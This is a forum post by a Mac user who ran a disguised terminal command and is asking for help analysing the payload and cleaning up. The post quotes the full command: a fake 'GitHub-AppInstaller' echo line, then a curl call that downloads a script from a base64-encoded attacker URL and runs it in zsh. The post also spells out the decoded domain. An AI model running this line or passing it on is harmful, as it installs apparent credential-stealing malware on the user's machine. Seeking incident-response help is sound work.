Hi everyone,
I made a stupid mistake and executed this command in terminal on my Macbook:
>!echo "GitHub-AppInstaller: https://dl.github.com/drive-file-stream/GitHubApplicationSetup.dmg" && curl -kfsSL $(echo 'aHR0cHM6Ly9mb2V3cGVlZTJ0b2wuY29tL2RlYnVnL2xvYWRlci5zaD9idWlsZD01MGU0YWZhY2VjYjcxMDAxZTdlZmJjODU2MTlmY2E0OQ=='|base64 -D)|zsh!<
The decoded URL downloads loader.sh from foewpeee2tol.com/debug/loader.sh?build=50e4afac... which contains an obfuscated payload.
Questions:
- Can someone decode/decompress this payload safely and tell me exactly what it does?
- What data does it steal (passwords, keychain, browser data)?
- Does it install persistence (LaunchAgents, cron, profiles)?
- What should I check first?
My goal is to understand exactly what ran + complete cleanup steps.
Thanks for any help, feeling pretty dumb right now.